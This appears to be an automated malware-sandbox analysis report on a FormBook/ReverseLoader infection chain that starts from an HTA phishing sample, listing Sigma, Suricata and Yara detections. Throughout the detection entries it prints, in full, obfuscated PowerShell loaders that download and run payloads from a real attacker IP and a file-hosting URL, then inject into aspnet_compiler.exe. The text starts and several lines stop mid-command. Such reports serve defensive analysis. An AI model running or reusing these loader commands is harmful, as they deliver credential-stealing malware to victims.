INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgI

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7704, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , ProcessId: 3048, ProcessName: wscript.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3520, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 7936, ProcessName: aspnet_compiler.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7704, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline", ProcessId: 7936, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7704, TargetFilename: C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7704, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , ProcessId: 3048, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7704, TargetFilename: C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", CommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICA

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7704, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline", ProcessId: 7936, ProcessName: csc.exe

Suricata Signatures

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T07:38:11.945112+0100	2049038	1	A Network Trojan was detected	142.215.209.77	443	192.168.2.10	49716	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T07:38:00.234524+0100	2858795	1	A Network Trojan was detected	192.168.2.10	49704	146.70.113.200	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected FormBook

Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1651008436.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: seemebestthingsgivenmegood.hta, type: SAMPLE

Source: unknown

HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.10:49716 version: TLS 1.2

Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000D.00000002.1648730037.0000000007A1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1647938551.0000000007440000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: q6C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.pdb source: powershell.exe, 00000003.00000002.1352224226.0000000004F32000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000D.00000002.1648730037.0000000007A1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1647938551.0000000007440000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000D.00000002.1648730037.0000000007A1A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemb